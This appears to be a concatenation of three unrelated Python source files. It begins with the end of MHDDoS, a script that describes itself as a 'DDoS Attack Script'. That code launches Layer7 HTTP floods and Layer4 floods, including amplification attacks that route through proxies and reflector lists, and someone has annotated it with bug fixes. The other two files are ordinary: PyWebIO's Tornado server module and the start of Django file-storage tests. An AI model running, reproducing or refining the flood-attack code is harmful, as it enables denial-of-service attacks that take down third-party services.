t[4], t[5], t[6], t[7], str(cpu_percent()) + "%",
str(virtual_memory().percent) + "%"))
if cmd in ["CFIP", "DNS"]:
print("Soon")
continue
if cmd == "CHECK":
while True:
with suppress(Exception):
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
if "/" not in domain: continue
print('please wait ...', end="\r")
with get(domain, timeout=20) as r:
print(('status_code: %d\n'
'status: %s') %
(r.status_code, "ONLINE"
if r.status_code <= 500 else "OFFLINE"))
return
print("Error!")
if cmd == "INFO":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.info(domain)
if not info["success"]:
print("Error!")
continue
logger.info(("Country: %s\n"
"City: %s\n"
"Org: %s\n"
"Isp: %s\n"
"Region: %s\n") %
(info["country"], info["city"], info["org"],
info["isp"], info["region"]))
if cmd == "TSSRV":
while True:
domain = input(f'{cons}give-me-domain# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
continue
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
info = ToolsConsole.ts_srv(domain)
logger.info("TCP: %s\n" % (info['_tsdns._tcp.']))
logger.info("UDP: %s\n" % (info['_ts3._udp.']))
if cmd == "PING":
while True:
domain = input(f'{cons}give-me-ipaddress# ')
if not domain: continue
if domain.upper() == "BACK": break
if domain.upper() == "CLEAR":
print("\033c")
if (domain.upper() == "E") or \
(domain.upper() == "EXIT") or \
(domain.upper() == "Q") or \
(domain.upper() == "QUIT") or \
(domain.upper() == "LOGOUT") or \
(domain.upper() == "CLOSE"):
exit(-1)
domain = domain.replace('https://',
'').replace('http://', '')
if "/" in domain: domain = domain.split("/")[0]
print('please wait ...', end="\r")
r = ping(domain, count=5, interval=0.2)
logger.info(('Address: %s\n'
'Ping: %d\n'
'Aceepted Packets: %d/%d\n'
'status: %s\n') %
(r.address, r.avg_rtt, r.packets_received,
r.packets_sent,
"ONLINE" if r.is_alive else "OFFLINE"))
@staticmethod
def stop():
print('All Attacks has been Stopped !')
for proc in process_iter():
if proc.name() == "python.exe":
proc.kill()
@staticmethod
def usage():
print((
'* MHDDoS - DDoS Attack Script With %d Methods\n'
'Note: If the Proxy list is empty, the attack will run without proxies\n'
' If the Proxy file doesn\'t exist, the script will download proxies and check them.\n'
' Proxy Type 0 = All in config.json\n'
' SocksTypes:\n'
' - 6 = RANDOM\n'
' - 5 = SOCKS5\n'
' - 4 = SOCKS4\n'
' - 1 = HTTP\n'
' - 0 = ALL\n'
' > Methods:\n'
' - Layer4\n'
' | %s | %d Methods\n'
' - Layer7\n'
' | %s | %d Methods\n'
' - Tools\n'
' | %s | %d Methods\n'
' - Others\n'
' | %s | %d Methods\n'
' - All %d Methods\n'
'\n'
'Example:\n'
' L7: python3 %s <method> <url> <socks_type> <threads> <proxylist> <rpc> <duration> <debug=optional>\n'
' L4: python3 %s <method> <ip:port> <threads> <duration>\n'
' L4 Proxied: python3 %s <method> <ip:port> <threads> <duration> <socks_type> <proxylist>\n'
' L4 Amplification: python3 %s <method> <ip:port> <threads> <duration> <reflector file (only use with'
' Amplification)>\n') %
(len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
", ".join(Methods.LAYER4_METHODS), len(Methods.LAYER4_METHODS),
", ".join(Methods.LAYER7_METHODS), len(Methods.LAYER7_METHODS),
", ".join(ToolsConsole.METHODS), len(ToolsConsole.METHODS),
", ".join(["TOOLS", "HELP", "STOP"]), 3,
len(Methods.ALL_METHODS) + 3 + len(ToolsConsole.METHODS),
argv[0], argv[0], argv[0], argv[0]))
# noinspection PyBroadException
@staticmethod
def ts_srv(domain):
    """Look up TeamSpeak SRV records for *domain*.

    :param domain: bare domain name (no scheme/path).
    :return: dict mapping each SRV prefix to "host:port", or 'Not found'
        when resolution fails or times out.
    """
    records = ['_ts3._udp.', '_tsdns._tcp.']
    DnsResolver = resolver.Resolver()
    DnsResolver.timeout = 1
    DnsResolver.lifetime = 1
    Info = {}
    for rec in records:
        try:
            # BUG FIX: use the configured resolver instance (1s
            # timeout/lifetime); the old code called the module-level
            # resolver.resolve(), ignoring DnsResolver entirely.
            srv_records = DnsResolver.resolve(rec + domain, 'SRV')
            for srv in srv_records:
                Info[rec] = str(srv.target).rstrip('.') + ':' + str(
                    srv.port)
        except Exception:
            # Any DNS failure (NXDOMAIN, timeout, no SRV) maps to a marker.
            Info[rec] = 'Not found'
    return Info
# noinspection PyUnreachableCode
@staticmethod
def info(domain):
    """Fetch WHOIS/geo JSON for *domain*; return a failure dict on error."""
    with suppress(Exception):
        with get("https://ipwhois.app/json/%s/" % domain) as resp:
            return resp.json()
    # Reached only when the request or JSON decoding raised.
    return {"success": False}
def handleProxyList(con, proxy_li, proxy_ty, url=None):
    """Load (or download, check and persist) the proxy list for an attack.

    :param con: parsed config.json dict with proxy download sources.
    :param proxy_li: Path of the proxy list file.
    :param proxy_ty: socks type — 0=ALL, 1=HTTP, 4=SOCKS4, 5=SOCKS5, 6=RANDOM.
    :param url: optional target URL used as the proxy-check endpoint.
    :return: set of working proxies, or None when the file is empty.
    """
    if proxy_ty not in {4, 5, 1, 0, 6}:
        exit("Socks Type Not Found [4, 5, 1, 0, 6]")
    if proxy_ty == 6:
        # RANDOM: pick one concrete socks type for this run.
        proxy_ty = randchoice([4, 5, 1])
    if not proxy_li.exists():
        logger.warning("The file doesn't exist, creating files and downloading proxies.")
        proxy_li.parent.mkdir(parents=True, exist_ok=True)
        with proxy_li.open("w") as wr:
            Proxies: Set[Proxy] = ProxyManager.DownloadFromConfig(con, proxy_ty)
            logger.info(
                f"{len(Proxies):,} Proxies are getting checked, this may take awhile!"
            )
            # NOTE(review): `threads` is a module-level global bound in
            # __main__ — confirm it is always set before this call.
            Proxies = ProxyChecker.checkAll(
                Proxies, timeout=1, threads=threads,
                url=url.human_repr() if url else "http://httpbin.org/get",
            )
            if not Proxies:
                exit(
                    "Proxy Check failed, Your network may be the problem"
                    " | The target may not be available."
                )
            # Persist all working proxies in a single write.
            wr.write("".join(f"{proxy}\n" for proxy in Proxies))
    proxies = ProxyUtiles.readFromFile(proxy_li)
    if proxies:
        logger.info(f"Proxy Count: {len(proxies):,}")
    else:
        # Typo fix: "witout" -> "without".
        logger.info(
            "Empty Proxy File, running flood without proxy")
        proxies = None

    return proxies
if __name__ == '__main__':
    # Load proxy download sources and other settings.
    with open(__dir__ / "config.json") as f:
        con = load(f)
    with suppress(KeyboardInterrupt):
        # An IndexError (missing CLI args, or explicit HELP) falls through
        # to the usage message at the bottom.
        with suppress(IndexError):
            one = argv[1].upper()
            if one == "HELP":
                raise IndexError()
            if one == "TOOLS":
                ToolsConsole.runConsole()
            if one == "STOP":
                ToolsConsole.stop()

            method = one
            host = None
            url = None
            event = Event()
            event.clear()
            target = None
            urlraw = argv[2].strip()
            if not urlraw.startswith("http"):
                urlraw = "http://" + urlraw

            if method not in Methods.ALL_METHODS:
                exit("Method Not Found %s" %
                     ", ".join(Methods.ALL_METHODS))

            if method in Methods.LAYER7_METHODS:
                url = URL(urlraw)
                host = url.host
                try:
                    host = gethostbyname(url.host)
                except Exception as e:
                    # BUG FIX: exit() takes a single argument; the old
                    # exit('...', url.host, e) raised a TypeError instead
                    # of printing the message.
                    exit('Cannot resolve hostname %s %s' % (url.host, e))

                threads = int(argv[4])
                rpc = int(argv[6])
                timer = int(argv[7])
                proxy_ty = int(argv[3].strip())
                proxy_li = Path(__dir__ / "files/proxies/" /
                                argv[5].strip())
                useragent_li = Path(__dir__ / "files/useragent.txt")
                referers_li = Path(__dir__ / "files/referers.txt")
                bombardier_path = Path(__dir__ / "go/bin/bombardier")
                proxies: Any = set()

                if method == "BOMB":
                    assert (
                        bombardier_path.exists()
                        or bombardier_path.with_suffix('.exe').exists()
                    ), (
                        "Install bombardier: "
                        "https://github.com/MHProDev/MHDDoS/wiki/BOMB-method"
                    )

                if len(argv) == 9:
                    logger.setLevel("DEBUG")

                if not useragent_li.exists():
                    exit("The Useragent file doesn't exist ")
                if not referers_li.exists():
                    exit("The Referer file doesn't exist ")

                uagents = set(a.strip()
                              for a in useragent_li.open("r+").readlines())
                referers = set(a.strip()
                               for a in referers_li.open("r+").readlines())

                if not uagents: exit("Empty Useragent File ")
                if not referers: exit("Empty Referer File ")

                if threads > 1000:
                    logger.warning("Thread is higher than 1000")
                if rpc > 100:
                    # Typo fix: "Pre" -> "Per".
                    logger.warning(
                        "RPC (Request Per Connection) is higher than 100")

                proxies = handleProxyList(con, proxy_li, proxy_ty, url)
                for _ in range(threads):
                    HttpFlood(url, host, method, rpc, event, uagents,
                              referers, proxies).start()

            if method in Methods.LAYER4_METHODS:
                target = URL(urlraw)
                port = target.port
                target = target.host

                try:
                    target = gethostbyname(target)
                except Exception as e:
                    # BUG FIX: `url` is None on the Layer4 path, so the old
                    # exit('...', url.host, e) crashed with AttributeError
                    # (and exit() takes one argument anyway); report the
                    # host that failed to resolve instead.
                    exit('Cannot resolve hostname %s %s' % (target, e))

                if port > 65535 or port < 1:
                    exit("Invalid Port [Min: 1 / Max: 65535] ")

                # Amplification/raw methods need a raw socket (usually root).
                if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD", "SYN"} and \
                        not ToolsConsole.checkRawSocket():
                    exit("Cannot Create Raw Socket")

                threads = int(argv[3])
                timer = int(argv[4])
                proxies = None
                ref = None

                if not port:
                    logger.warning("Port Not Selected, Set To Default: 80")
                    port = 80

                if len(argv) >= 6:
                    argfive = argv[5].strip()
                    if argfive:
                        refl_li = Path(__dir__ / "files" / argfive)
                        if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "CLDAP", "ARD"}:
                            # Amplification mode: arg 5 is a reflector file.
                            if not refl_li.exists():
                                exit("The reflector file doesn't exist")
                            if len(argv) == 7:
                                logger.setLevel("DEBUG")
                            ref = set(a.strip()
                                      for a in ProxyTools.Patterns.IP.findall(
                                          refl_li.open("r+").read()))
                            if not ref: exit("Empty Reflector File ")

                        elif argfive.isdigit() and len(argv) >= 7:
                            # Proxied L4 mode: arg 5 is the socks type,
                            # arg 6 the proxy list file.
                            if len(argv) == 8:
                                logger.setLevel("DEBUG")
                            proxy_ty = int(argfive)
                            proxy_li = Path(__dir__ / "files/proxies" / argv[6].strip())
                            proxies = handleProxyList(con, proxy_li, proxy_ty)
                            if method not in {"MINECRAFT", "MCBOT", "TCP", "CPS", "CONNECTION"}:
                                exit("this method cannot use for layer4 proxy")

                        else:
                            logger.setLevel("DEBUG")

                for _ in range(threads):
                    Layer4((target, port), ref, method, event,
                           proxies).start()

            logger.info(
                "Attack Started to %s with %s method for %s seconds, threads: %d!"
                % (target or url.human_repr(), method, timer, threads))
            event.set()
            ts = time()
            # Emit per-second PPS/BPS stats until the timer expires, then
            # signal all worker threads to stop.
            while time() < ts + timer:
                logger.debug('PPS: %s, BPS: %s / %d%%' %
                             (Tools.humanformat(int(REQUESTS_SENT)),
                              Tools.humanbytes(int(BYTES_SEND)),
                              round((time() - ts) / timer * 100, 2)))
                REQUESTS_SENT.set(0)
                BYTES_SEND.set(0)
                sleep(1)
            event.clear()
            exit()

        ToolsConsole.usage()
|
tornado.py | import asyncio
import fnmatch
import json
import logging
import os
import threading
import webbrowser
from functools import partial
from urllib.parse import urlparse
import tornado
import tornado.httpserver
import tornado.ioloop
from tornado.web import StaticFileHandler
from tornado.websocket import WebSocketHandler
from .utils import make_applications, render_page, cdn_validation
from ..session import CoroutineBasedSession, ThreadBasedSession, ScriptModeSession, \
register_session_implement_for_target, Session
from ..session.base import get_session_info_from_headers
from ..utils import get_free_port, wait_host_port, STATIC_PATH, iscoroutinefunction, isgeneratorfunction, check_webio_js
logger = logging.getLogger(__name__)
_ioloop = None


def ioloop() -> tornado.ioloop.IOLoop:
    """Return the IOLoop running the Tornado server (None before start)."""
    return _ioloop
def _check_origin(origin, allowed_origins, handler: WebSocketHandler):
    """Return True when *origin* is same-site or matches an allowed pattern."""
    if _is_same_site(origin, handler):
        return True
    # Patterns use Unix shell-style wildcards (fnmatch).
    for pattern in allowed_origins:
        if fnmatch.fnmatch(origin, pattern):
            return True
    return False
def _is_same_site(origin, handler: WebSocketHandler):
    """Check that the request Origin's netloc matches the Host header exactly."""
    netloc = urlparse(origin).netloc.lower()
    # Same-site means an exact match against Host, ports included.
    return netloc == handler.request.headers.get("Host")
def _webio_handler(applications, cdn, check_origin_func=_is_same_site):
    """Build the Tornado RequestHandler class used for the integration.

    :param dict applications: mapping of task name -> task function
    :param bool/str cdn: whether/where to load front-end static resources
    :param callable check_origin_func: check_origin_func(origin, handler) -> bool
    :return: a Tornado RequestHandler (WebSocket) class
    """
    check_webio_js()

    class WSHandler(WebSocketHandler):
        async def get(self, *args, **kwargs) -> None:
            # It's a simple http GET request
            if self.request.headers.get("Upgrade", "").lower() != "websocket":
                # Backward compatible
                if self.get_query_argument('test', ''):
                    return self.write('')

                # Serve the rendered app page; unknown app names fall back
                # to the 'index' application.
                app_name = self.get_query_argument('app', 'index')
                app = applications.get(app_name) or applications['index']
                html = render_page(app, protocol='ws', cdn=cdn)
                return self.write(html)
            else:
                await super().get()

        def check_origin(self, origin):
            return check_origin_func(origin=origin, handler=self)

        def get_compression_options(self):
            # Non-None enables compression with default options.
            return {}

        def send_msg_to_client(self, session: Session):
            # Flush all pending session commands to the browser as JSON.
            for msg in session.get_task_commands():
                self.write_message(json.dumps(msg))

        def open(self):
            logger.debug("WebSocket opened")
            # self.set_nodelay(True)

            self._close_from_session_tag = False  # set when the session itself closes the connection

            session_info = get_session_info_from_headers(self.request.headers)
            session_info['user_ip'] = self.request.remote_ip
            session_info['request'] = self.request
            session_info['backend'] = 'tornado'

            # Coroutine/generator apps get the coroutine-based session;
            # plain functions run in a thread-based session.
            app_name = self.get_query_argument('app', 'index')
            application = applications.get(app_name) or applications['index']
            if iscoroutinefunction(application) or isgeneratorfunction(application):
                self.session = CoroutineBasedSession(application, session_info=session_info,
                                                     on_task_command=self.send_msg_to_client,
                                                     on_session_close=self.close_from_session)
            else:
                self.session = ThreadBasedSession(application, session_info=session_info,
                                                  on_task_command=self.send_msg_to_client,
                                                  on_session_close=self.close_from_session,
                                                  loop=asyncio.get_event_loop())

        def on_message(self, message):
            data = json.loads(message)
            if data is not None:
                self.session.send_client_event(data)

        def close_from_session(self):
            self._close_from_session_tag = True
            self.close()

        def on_close(self):
            if not self._close_from_session_tag:  # only call session.close() when the client disconnected on its own
                self.session.close()
            logger.debug("WebSocket closed")

    return WSHandler
def webio_handler(applications, cdn=True, allowed_origins=None, check_origin=None):
    """Build a Tornado RequestHandler class serving PyWebIO apps over WebSocket.

    :param callable/list/dict applications: PyWebIO application(s).
    :param bool/str cdn: load front-end static resources from CDN (``True``),
        from the deploy URL's sibling path (``False``), or from a custom URL.
    :param list allowed_origins: extra request origins accepted besides the
        current host.
    :param callable check_origin: origin-check callback; when given,
        ``allowed_origins`` is ignored.

    See the parameters of :func:`pywebio.platform.tornado.start_server` for
    detailed semantics.

    :return: a Tornado RequestHandler class
    """
    applications = make_applications(applications)
    for app in applications.values():
        register_session_implement_for_target(app)

    cdn = cdn_validation(cdn, 'error')

    if check_origin is not None:
        def origin_ok(origin, handler):
            return _is_same_site(origin, handler) or check_origin(origin)
        check_origin_func = origin_ok
    else:
        check_origin_func = partial(_check_origin, allowed_origins=allowed_origins or [])

    return _webio_handler(applications=applications, cdn=cdn, check_origin_func=check_origin_func)
async def open_webbrowser_on_server_started(host, port):
    """Open the served URL in a browser once the port accepts connections."""
    url = 'http://%s:%s' % (host, port)
    # Poll the port for up to 20 seconds before giving up.
    if await wait_host_port(host, port, duration=20):
        logger.info('Try open %s in web browser' % url)
        webbrowser.open(url)
    else:
        logger.error('Open %s failed.' % url)
def _setup_server(webio_handler, port=0, host='', **tornado_app_settings):
    """Create and start a Tornado app: the WebIO handler plus static files."""
    if port == 0:
        # Let the OS pick a free port.
        port = get_free_port()

    routes = [
        (r"/", webio_handler),
        (r"/(.*)", StaticFileHandler,
         {"path": STATIC_PATH, 'default_filename': 'index.html'}),
    ]
    application = tornado.web.Application(handlers=routes, **tornado_app_settings)
    server = application.listen(port, address=host)
    return server, port
def start_server(applications, port=0, host='',
                 debug=False, cdn=True,
                 allowed_origins=None, check_origin=None,
                 auto_open_webbrowser=False,
                 websocket_max_message_size=None,
                 websocket_ping_interval=None,
                 websocket_ping_timeout=None,
                 **tornado_app_settings):
    """Start a Tornado server exposing PyWebIO applications as a web service.

    Tornado is PyWebIO's default backend server; this function can be
    imported directly with ``from pywebio import start_server``.

    :param list/dict/callable applications: PyWebIO application(s) — a task
        function, or a dict/list of task functions. For a dict the keys are
        task names; for a list the function names are used. The task to run
        is selected with the ``app`` URL parameter (e.g.
        ``http://host:port/?app=foo``); the ``index`` task is the default,
        and a default index page is served when no ``index`` task exists.
        Coroutine task functions use the coroutine-based session
        implementation; ordinary functions use the thread-based one.
    :param int port: port to listen on; ``0`` picks a free port.
    :param str host: address to bind. A hostname binds all addresses
        associated with it; an empty string or ``None`` binds all available
        interfaces.
    :param bool debug: enable Tornado debug mode (auto-restart on code
        change). See the Tornado docs on debug mode.
    :param bool/str cdn: load front-end static resources from CDN
        (``True``) or from the deploy URL's sibling path (``False``); a
        custom URL string may also be given.
    :param list allowed_origins: extra request origins (scheme + host +
        port) accepted besides the current host; Unix shell-style wildcards
        (``*``, ``?``, ``[seq]``, ``[!seq]``) are supported, e.g.
        ``https://*.example.com``.
    :param callable check_origin: origin-check callback receiving the
        origin string and returning True/False; overrides
        ``allowed_origins`` when given.
    :param bool auto_open_webbrowser: open a browser to the service after
        startup (requires OS support).
    :param int websocket_max_message_size: max accepted WebSocket message
        size in bytes (default 10MiB).
    :param int websocket_ping_interval: send a 'ping' on each WebSocket
        connection every N seconds; useful behind reverse proxies that
        close idle connections, and to detect abnormal disconnects.
    :param int websocket_ping_timeout: close the connection when no 'pong'
        arrives within N seconds of a ping; defaults to three times the
        ping interval.
    :param tornado_app_settings: extra keyword arguments forwarded to the
        ``tornado.web.Application`` constructor. See:
        https://www.tornadoweb.org/en/stable/web.html#tornado.web.Application.settings

    .. versionadded:: 1.1
       The *cdn* parameter.
    """
    # Snapshot the argument values; this relies on locals() being called
    # before any other local variable is bound.
    kwargs = locals()
    global _ioloop
    _ioloop = tornado.ioloop.IOLoop.current()

    # Forward only explicitly-set options into the Tornado app settings.
    app_options = ['debug', 'websocket_max_message_size', 'websocket_ping_interval', 'websocket_ping_timeout']
    for opt in app_options:
        if kwargs[opt] is not None:
            tornado_app_settings[opt] = kwargs[opt]

    cdn = cdn_validation(cdn, 'warn')

    handler = webio_handler(applications, cdn, allowed_origins=allowed_origins, check_origin=check_origin)
    _, port = _setup_server(webio_handler=handler, port=port, host=host, **tornado_app_settings)
    print('Listen on %s:%s' % (host or '0.0.0.0', port))

    if auto_open_webbrowser:
        tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, host or 'localhost', port)
    # Blocks until the IOLoop is stopped.
    tornado.ioloop.IOLoop.current().start()
def start_server_in_current_thread_session():
    """Start the script-mode server on a free port and open a browser.

    The PYWEBIO_SCRIPT_MODE_PORT environment variable can fix the listen
    port and disables auto-opening the browser (used for testing).
    """
    websocket_conn_opened = threading.Event()
    thread = threading.current_thread()
    mock_apps = dict(index=lambda: None)

    class SingleSessionWSHandler(_webio_handler(applications=mock_apps, cdn=False)):
        # Class-level: exactly one ScriptModeSession is allowed; extra
        # connections are closed immediately in open().
        session = None
        instance = None

        def open(self):
            self.main_session = False
            if SingleSessionWSHandler.session is None:
                self.main_session = True
                SingleSessionWSHandler.instance = self
                session_info = get_session_info_from_headers(self.request.headers)
                session_info['user_ip'] = self.request.remote_ip
                session_info['request'] = self.request
                session_info['backend'] = 'tornado'
                SingleSessionWSHandler.session = ScriptModeSession(thread, session_info=session_info,
                                                                   on_task_command=self.send_msg_to_client,
                                                                   loop=asyncio.get_event_loop())
                websocket_conn_opened.set()
            else:
                self.close()

        def on_close(self):
            if SingleSessionWSHandler.session is not None and self.main_session:
                self.session.close()
                logger.debug('ScriptModeSession closed')

    async def wait_to_stop_loop(server):
        """Shut the server down once only the current thread and daemon threads remain."""
        # Count of non-daemon threads, including the current one.
        alive_none_daemonic_thread_cnt = None
        while alive_none_daemonic_thread_cnt != 1:
            alive_none_daemonic_thread_cnt = sum(
                1 for t in threading.enumerate() if t.is_alive() and not t.isDaemon()
            )
            await asyncio.sleep(1)

        # Close the WebSocket connection.
        if SingleSessionWSHandler.instance:
            SingleSessionWSHandler.instance.close()

        server.stop()
        logger.debug('Closing tornado ioloop...')
        tasks = [t for t in asyncio.all_tasks() if t is not asyncio.current_task() and not t.done()]
        for task in tasks: task.cancel()

        # An `await asyncio.sleep` is required here, otherwise the
        # task.cancel() calls above never get scheduled.
        await asyncio.sleep(0)

        tornado.ioloop.IOLoop.current().stop()

    def server_thread():
        # Silence Tornado's own loggers below ERROR.
        from tornado.log import access_log, app_log, gen_log
        access_log.setLevel(logging.ERROR)
        app_log.setLevel(logging.ERROR)
        gen_log.setLevel(logging.ERROR)

        # This thread needs its own asyncio event loop for Tornado.
        loop = asyncio.new_event_loop()
        asyncio.set_event_loop(loop)

        global _ioloop
        _ioloop = tornado.ioloop.IOLoop.current()

        port = 0
        if os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"):
            port = int(os.environ.get("PYWEBIO_SCRIPT_MODE_PORT"))

        server, port = _setup_server(webio_handler=SingleSessionWSHandler, port=port, host='localhost')
        tornado.ioloop.IOLoop.current().spawn_callback(partial(wait_to_stop_loop, server=server))

        if "PYWEBIO_SCRIPT_MODE_PORT" not in os.environ:
            tornado.ioloop.IOLoop.current().spawn_callback(open_webbrowser_on_server_started, 'localhost', port)

        tornado.ioloop.IOLoop.current().start()
        logger.debug('Tornado server exit')

    t = threading.Thread(target=server_thread, name='Tornado-server')
    t.start()

    # Block the caller until the browser has connected.
    websocket_conn_opened.wait()
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
    """Tests for the get_storage_class() dotted-path import helper."""

    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        self.assertEqual(
            get_storage_class('django.core.files.storage.FileSystemStorage'),
            FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import don't exist.
        """
        with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
            get_storage_class('storage.NonexistentStorage')

    def test_get_nonexistent_storage_class(self):
        """
        get_storage_class raises an error if the requested class don't exist.
        """
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonexistentStorage')

    def test_get_nonexistent_storage_module(self):
        """
        get_storage_class raises an error if the requested module don't exist.
        """
        with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
            get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
    """Deconstruction and lazy-argument behavior of FileSystemStorage."""

    def test_deconstruction(self):
        # With defaults, only the customized 'location' kwarg is serialized.
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, tuple())
        self.assertEqual(kwargs, {'location': temp_storage_location})

        kwargs_orig = {
            'location': temp_storage_location,
            'base_url': 'http://myfiles.example.com/'
        }
        storage = FileSystemStorage(**kwargs_orig)
        path, args, kwargs = storage.deconstruct()
        # Explicitly-passed kwargs must round-trip unchanged.
        self.assertEqual(kwargs, kwargs_orig)

    def test_lazy_base_url_init(self):
        """
        FileSystemStorage.__init__() shouldn't evaluate base_url.
        """
        # reverse_lazy only resolves (raising NoReverseMatch) on first access.
        storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
        with self.assertRaises(NoReverseMatch):
            storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
    # Fresh storage rooted at a throwaway temp dir for every test.
    self.temp_dir = tempfile.mkdtemp()
    self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
    # Set up a second temporary directory which is ensured to have a mixed
    # case name.
    self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
    # Remove both temp dirs and everything the tests wrote into them.
    shutil.rmtree(self.temp_dir)
    shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
    """
    Makes sure an exception is raised if the location is empty
    """
    storage = self.storage_class(location='')
    self.assertEqual(storage.base_location, '')
    # An empty location resolves to the current working directory.
    self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
    """
    Standard file access options are available, and work as expected.
    """
    self.assertFalse(self.storage.exists('storage_test'))
    # Write, re-read, then delete through the storage API only.
    f = self.storage.open('storage_test', 'w')
    f.write('storage contents')
    f.close()
    self.assertTrue(self.storage.exists('storage_test'))

    f = self.storage.open('storage_test', 'r')
    self.assertEqual(f.read(), 'storage contents')
    f.close()

    self.storage.delete('storage_test')
    self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
    """Run a file-time getter through both USE_TZ=True and USE_TZ=False."""
    # Check for correct behavior under both USE_TZ=True and USE_TZ=False.
    # The tests are similar since they both set up a situation where the
    # system time zone, Django's TIME_ZONE, and UTC are distinct.
    self._test_file_time_getter_tz_handling_on(getter)
    self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
    """With USE_TZ=True the getter must return an aware datetime in UTC."""
    # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
    # is UTC+1 and has no DST change. We can set the Django TZ to something
    # else so that UTC, Django's TIME_ZONE, and the system timezone are all
    # different.
    now_in_algiers = timezone.make_aware(datetime.now())

    with timezone.override(timezone.get_fixed_timezone(-300)):
        # At this point the system TZ is +1 and the Django TZ
        # is -5. The following will be aware in UTC.
        now = timezone.now()
        self.assertFalse(self.storage.exists('test.file.tz.on'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file.tz.on', f)
        self.addCleanup(self.storage.delete, f_name)
        dt = getter(f_name)
        # dt should be aware, in UTC
        self.assertTrue(timezone.is_aware(dt))
        self.assertEqual(now.tzname(), dt.tzname())

        # The three timezones are indeed distinct.
        naive_now = datetime.now()
        algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
        django_offset = timezone.get_current_timezone().utcoffset(naive_now)
        utc_offset = timezone.utc.utcoffset(naive_now)
        self.assertGreater(algiers_offset, utc_offset)
        self.assertLess(django_offset, utc_offset)

        # dt and now should be the same effective time.
        self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
    """With USE_TZ=False the getter must return a naive datetime in local time."""
    # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
    # is UTC+1 and has no DST change. We can set the Django TZ to something
    # else so that UTC, Django's TIME_ZONE, and the system timezone are all
    # different.
    now_in_algiers = timezone.make_aware(datetime.now())

    with timezone.override(timezone.get_fixed_timezone(-300)):
        # At this point the system TZ is +1 and the Django TZ
        # is -5.
        self.assertFalse(self.storage.exists('test.file.tz.off'))

        f = ContentFile('custom contents')
        f_name = self.storage.save('test.file.tz.off', f)
        self.addCleanup(self.storage.delete, f_name)
        dt = getter(f_name)
        # dt should be naive, in system (+1) TZ
        self.assertTrue(timezone.is_naive(dt))

        # The three timezones are indeed distinct.
        naive_now = datetime.now()
        algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
        django_offset = timezone.get_current_timezone().utcoffset(naive_now)
        utc_offset = timezone.utc.utcoffset(naive_now)
        self.assertGreater(algiers_offset, utc_offset)
        self.assertLess(django_offset, utc_offset)

        # dt and naive_now should be the same effective time.
        self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
        # If we convert dt to an aware object using the Algiers
        # timezone then it should be the same effective time to
        # now_in_algiers.
        _dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
